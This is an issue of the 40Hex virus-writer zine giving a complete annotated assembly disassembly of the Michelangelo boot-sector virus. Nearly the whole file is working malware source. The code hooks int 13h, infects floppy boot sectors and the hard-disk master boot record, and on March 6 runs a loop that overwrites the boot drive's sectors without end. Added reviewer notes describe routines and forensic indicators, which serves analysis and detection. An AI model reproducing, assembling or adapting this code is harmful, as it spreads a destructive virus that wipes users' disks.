
  1. 40Hex Number 8 Volume 2 Issue 4                                       File 006
  2.  
  3. ; This is a disassembly of the much-hyped michelangelo virus.
  4. ; As you can see, it is a derivative of the Stoned virus.  The
  5. ; junk bytes at the end of the file are probably throwbacks to
  6. ; the Stoned virus.  In any case, it is yet another boot sector
  7. ; and partition table infector.
  8.  
  9. michelangelo    segment byte public
  10.                 assume  cs:michelangelo, ds:michelangelo
  11. ; Disassembly by Dark Angel of PHALCON/SKISM
      ; Reviewer annotations (marked NOTE(review) where they correct or hedge
      ; the original comments) describe what each routine does and which of
      ; its side effects are usable as detection / forensic indicators.
  12.                 org     0
  13.  
      ; Image layout: entry jmp, four data items, the resident int 13h hook,
      ; the infection routine, the boot-time code, and finally partitioninfo,
      ; the 42h-byte tail that is refilled from every victim sector.
  14.                 jmp     entervirus
  15. highmemjmp      db      0F5h, 00h, 80h, 9Fh     ; far ptr 9F80h:00F5h; seg patched at boot
  16. maxhead         db      2                       ; used by damagestuff: 2 floppy, 4 HD
  17. firstsector     dw      3                       ; where the original sector was moved
  18. oldint13h       dd      0C8000256h              ; saved original int 13h vector
  19.  
      ; int13h - resident int 13h (BIOS disk services) hook.
      ;   In:  the caller's int 13h registers; dl = drive number.
      ;   Out: registers and flags exactly as the original handler returned
      ;        them, so the caller cannot tell the hook was there.
      ;   Only requests for drive 0 are passed through infectdisk after the
      ;   original handler has run; all others are chained to the saved
      ;   vector.  Indicator: after boot the int 13h vector's segment is the
      ;   top of the (reduced) conventional memory, not a BIOS/DOS segment.
  20. int13h:
  21.                 push    ds
  22.                 push    ax
  23.                 or      dl, dl                  ; default drive?
  24.                 jnz     exitint13h              ; exit if not
  25.                 xor     ax, ax
  26.                 mov     ds, ax
  27.                 test    byte ptr ds:[43fh], 1   ; disk 0 on?
  28.                 jnz     exitint13h              ; if not spinning, exit
      ; NOTE(review): 0040:003F is the BIOS diskette motor-status byte and
      ; bit 0 is drive 0's motor, so this jnz skips infection while the motor
      ; is already running - the opposite of what "if not spinning" suggests.
  29.                 pop     ax
  30.                 pop     ds
  31.                 pushf
  32.                 call    dword ptr cs:[oldint13h]; first call old int 13h
  33.                 pushf                           ; keep the real handler's flags (CF)
  34.                 call    infectdisk              ; then infect
  35.                 popf                            ; caller sees the original result
  36.                 retf    2                       ; iret-like: drop the int's pushed flags
  37. exitint13h:     pop     ax
  38.                 pop     ds
  39.                 jmp     dword ptr cs:[oldint13h]; chain, leaving flags/return to BIOS
  40.  
      ; infectdisk - infect the diskette in drive 0 (called from the hook).
      ;   In:  cs = resident virus segment.  All disk I/O goes through the
      ;        saved vector (pushf + far call), never through the hook, so
      ;        the hook is not re-entered.
      ;   Out: nothing.  Every register it touches is saved and restored;
      ;        flags are not preserved.
      ;   Side effects: original boot sector written to head 1, sector 3
      ;   (360 KB media) or 0Eh (anything else); the 42h-byte tail of the
      ;   victim sector is taken over into the image; the image is written
      ;   back over cylinder 0, head 0, sector 1.
  41. infectdisk:
  42.                 push    ax
  43.                 push    bx
  44.                 push    cx
  45.                 push    dx
  46.                 push    ds
  47.                 push    es
  48.                 push    si
  49.                 push    di
  50.                 push    cs
  51.                 pop     ds
  52.                 push    cs
  53.                 pop     es
  54.                 mov     si, 4                   ; up to four read attempts
  55. readbootblock:
  56.                 mov     ax,201h                 ; Read boot block to
  57.                 mov     bx,200h                 ; after virus
  58.         mov    cx,1                             ; cylinder 0, sector 1
  59.                 xor     dx,dx                   ; head 0, drive 0
  60.                 pushf
  61.                 call    oldint13h               ; far call through the saved vector
  62.                 jnc     checkinfect             ; continue if no error
  63.                 xor     ax,ax
  64.                 pushf
  65.                 call    oldint13h               ; Reset disk
  66.                 dec     si                      ; loop back
  67.                 jnz     readbootblock
  68.                 jmp     short quitinfect        ; exit if too many failures
      ; Infection marker = the first four bytes of the virus image (offset 0
      ; and 2 of cs) compared with the same offsets of the sector just read.
  69. checkinfect:
  70.                 xor     si,si
  71.                 cld
  72.                 lodsw
  73.                 cmp     ax,[bx]                 ; check if already infected
  74.                 jne     infectitnow
  75.                 lodsw
  76.                 cmp     ax,[bx+2]               ; check again
  77.                 je      quitinfect
  78. infectitnow:
  79.                 mov     ax,301h                 ; Write old boot block
  80.                 mov     dh,1                    ; to head 1
  81.                 mov     cl,3                    ; sector 3
  82.                 cmp     byte ptr [bx+15h],0FDh  ; 360k disk? ([bx+15h] = BPB media byte)
  83.                 je      is360Kdisk
  84.                 mov     cl,0Eh
  85. is360Kdisk:
  86.                 mov     firstsector,cx          ; remembered, and read back at boot time
  87.                 pushf
  88.                 call    oldint13h
  89.                 jc      quitinfect              ; exit on error
  90.                 mov     si,200h+offset partitioninfo
  91.                 mov     di,offset partitioninfo
  92.                 mov     cx,21h                  ; Copy partition table
  93.                 cld
  94.                 rep     movsw                   ; 21h words = 42h bytes: victim's tail
      ; NOTE(review): on a diskette this tail is not a partition table; it is
      ; presumably the last 42h bytes of the sector, kept so the written image
      ; still ends with whatever the victim had there.
  95.                 mov     ax,301h                 ; Write virus to sector 1
  96.                 xor     bx,bx                   ; es:bx = cs:0 = the virus image
  97.         mov    cx,1                             ; cylinder 0, sector 1
  98.                 xor     dx,dx                   ; head 0, drive 0
  99.                 pushf
  100.                 call    oldint13h
  101. quitinfect:
  102.         pop    di
  103.         pop    si
  104.         pop    es
  105.         pop    ds
  106.         pop    dx
  107.         pop    cx
  108.         pop    bx
  109.         pop    ax
  110.         retn
      ; entervirus - boot-time entry; the BIOS has loaded the infected sector
      ; at 0:7C00h.  Takes 2 KB off the top of conventional memory (word at
      ; 0040:0013), copies the code part of the image there, points int 13h
      ; at the hook in that copy, then jumps into the copy.
      ; Forensic indicators: 0040:0013 reads 2 KB less than the installed
      ; base memory, and the int 13h vector segment equals that value * 64.
  111. entervirus:
  112.                 xor     ax,ax
  113.         mov    ds,ax
  114.                 cli                             ; no interrupts while ss:sp is switched
  115.         mov    ss,ax
  116.                 mov     ax,7C00h                ; Set stack to just below
  117.                 mov     sp,ax                   ; virus load point
  118.                 sti
  119.                 push    ds                      ; save 0:7C00h on stack for
  120.                 push    ax                      ; later retf
  121.                 mov     ax,ds:[13h*4]           ; capture the BIOS int 13h vector
  122.                 mov     word ptr ds:[7C00h+offset oldint13h],ax
  123.                 mov     ax,ds:[13h*4+2]
  124.                 mov     word ptr ds:[7C00h+offset oldint13h+2],ax
  125.                 mov     ax,ds:[413h]            ; memory size in K
  126.                 dec     ax                      ; 1024 K
  127.         dec    ax                               ; two decrements = 2 KB reserved
  128.                 mov     ds:[413h],ax            ; move new value in
  129.                 mov     cl,6
  130.                 shl     ax,cl                   ; ax = paragraphs of memory
  131.                 mov     es,ax                   ; next line sets seg of jmp
  132.                 mov     word ptr ds:[7C00h+2+offset highmemjmp],ax
  133.                 mov     ax,offset int13h        ; int 13h := es:int13h (the high copy)
  134.                 mov     ds:[13h*4],ax
  135.                 mov     ds:[13h*4+2],es
  136.                 mov     cx,offset partitioninfo ; copy only the code, not the tail
  137.                 mov     si,7C00h
  138.                 xor     di,di
  139.                 cld
  140.                 rep     movsb                   ; copy to high memory
  141.                                                 ; and transfer control there
  142.                 jmp     dword ptr cs:[7C00h+offset highmemjmp]
  143. ; destination of highmem jmp
      ; From here on cs = the high-memory copy; ds is set to cs below, so
      ; firstsector/maxhead refer to the resident image.
  144.                 xor     ax,ax
  145.         mov    es,ax
  146.                 int     13h                     ; reset disk (ah = 0; dl presumably
                                                      ; still the BIOS boot drive)
  147.                 push    cs
  148.         pop    ds
  149.         mov    ax,201h                          ; read 1 sector to es:bx = 0:7C00h
  150.                 mov     bx,7C00h
  151.                 mov     cx,firstsector          ; the image on disk records where
  152.                 cmp     cx,7                    ; hard disk infection?
  153.                 jne     floppyboot              ; if not, do floppies
  154.                 mov     dx,80h                  ; Read old partition table of
  155.                 int     13h                     ; first hard disk to 0:7C00h
  156.                 jmp     short exitvirus         ; read error is not checked here
  157. floppyboot:
  158.                 mov     cx,firstsector          ; read old boot block
  159.                 mov     dx,100h                 ; to 0:7C00h (head 1, drive 0)
  160.                 int     13h
  161.                 jc      exitvirus
  162.         push    cs
  163.         pop    es
  164.                 mov     ax,201h                 ; read boot block
  165.                 mov     bx,200h                 ; of first hard disk
  166.         mov    cx,1                             ; cylinder 0, sector 1 (the MBR)
  167.         mov    dx,80h
  168.                 int     13h
  169.                 jc      exitvirus
  170.                 xor     si,si                   ; same four-byte marker check as above
  171.                 cld
  172.                 lodsw
  173.                 cmp     ax,[bx]                 ; is it infected?
  174.                 jne     infectharddisk          ; if not, infect HD
  175.                 lodsw                           ; check infection
  176.         cmp    ax,[bx+2]
  177.                 jne     infectharddisk
      ; exitvirus - trigger check, then hand-off to the original boot sector.
      ; int 1Ah/ah=4 returns the RTC date (dh = month, dl = day, in BCD);
      ; only dx is compared, so the payload fires on every March 6th of any
      ; year.  Otherwise retf goes to the 0:7C00h pushed in entervirus; the
      ; hook stays resident in either case.
  178. exitvirus:
  179.                 xor     cx,cx                   ; Real time clock get date
  180.                 mov     ah,4                    ; dx = mon/day
  181.                 int     1Ah
  182.                 cmp     dx,306h                 ; March 6th
  183.                 je      damagestuff
  184.                 retf                            ; return control to original
  185.                                                 ; boot block @ 0:7C00h
      ; damagestuff - payload.  Overwrites the boot drive starting at
      ; cylinder 0, head 0, sector 1 with whatever is at 5000h:5000h: 9 or
      ; 0Eh sectors per call on a floppy (dl = 0, 2 heads), 11h on the first
      ; hard disk (dl = 80h, 4 heads).  The loop has no exit path; it runs
      ; until the machine is reset.  The first cylinders (on DOS media the
      ; boot sector, FATs and root directory) go first, which is why data
      ; recovery afterwards is rarely possible.
  186. damagestuff:
  187.                 xor     dx,dx                   ; head 0, drive 0
  188.         mov    cx,1                             ; cylinder 0, sector 1
  189. smashanothersector:
  190.         mov    ax,309h                          ; write 9 sectors (360 KB case)
  191.                 mov     si,firstsector
  192.         cmp    si,3
  193.                 je      smashit
  194.         mov    al,0Eh                           ; write 0Eh sectors (other floppy)
  195.         cmp    si,0Eh
  196.                 je      smashit
  197.                 mov     dl,80h                  ; first hard disk
  198.                 mov     maxhead,4
  199.         mov    al,11h                           ; write 11h sectors (hard disk)
  200. smashit:
  201.                 mov     bx,5000h                ; random memory area
  202.                 mov     es,bx                   ; at 5000h:5000h
  203.                 int     13h                     ; Write al sectors to drive dl
  204.                 jnc     skiponerror             ; skip on error
  205.                 xor     ah,ah                   ; Reset disk drive dl
  206.                 int     13h                     ; errors never stop the loop
  207. skiponerror:
  208.                 inc     dh                      ; next head
  209.                 cmp     dh,maxhead              ; 2 if floppy, 4 if HD
  210.                 jb      smashanothersector
  211.                 xor     dh,dh                   ; go to next head/cylinder
  212.         inc    ch                               ; next cylinder; ch simply wraps
  213.                 jmp     short smashanothersector
      ; infectharddisk - reached on a floppy boot when the hard disk's MBR
      ; (read into cs:200h above) lacks the marker.  Writes the original MBR
      ; to cylinder 0, head 0, sector 7 of drive 80h, copies its 42h-byte
      ; tail (partition table + signature) into the image, and writes the
      ; image over sector 1.  firstsector := 7 marks the image as HD-resident.
  214. infectharddisk:
  215.                 mov     cx,7                    ; Write partition table to
  216.                 mov     firstsector,cx          ; sector 7
  217.         mov    ax,301h                          ; es:bx = cs:200h = the MBR just read
  218.         mov    dx,80h
  219.                 int     13h
  220.                 jc      exitvirus
  221.                 mov     si,200h+offset partitioninfo ; Copy partition
  222.                 mov     di,offset partitioninfo      ; table information
  223.         mov    cx,21h
  224.                 rep     movsw                   ; leaves cx = 0
  225.                 mov     ax,301h                 ; Write to sector 8
  226.                 xor     bx,bx                   ; Copy virus to sector 1
  227.         inc    cl                               ; cx = 1
      ; NOTE(review): cx is 0 after rep movsw, so inc cl makes cx = 1 and this
      ; write goes to cylinder 0, head 0, sector 1 (es:bx = cs:0, the image),
      ; not "sector 8"; dx is assumed still 80h from the previous call.
  228.                 int     13h
  229. ;*              jmp     short 01E0h
  230.                 db      0EBh, 32h               ; ?This should crash?
      ; NOTE(review): EB 32 is a short jmp to 01E0h.  If partitioninfo sits
      ; at the usual MBR offset 1BEh, that target lies inside the bytes just
      ; copied from the victim's partition table, so what executes next
      ; depends on that data - hence the author's doubt.  No ordinary path
      ; leads back to exitvirus from here.
  231. ; The following bytes are meaningless.
  232. garbage         db      1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h
  233. partitioninfo:  db      42h dup (0)             ; 66 bytes: partition table + 55AAh
  234. michelangelo    ends
  235.                 end
  236.  
  237.  
  238. Downloaded From P-80 International Information Systems 304-744-2253
  239.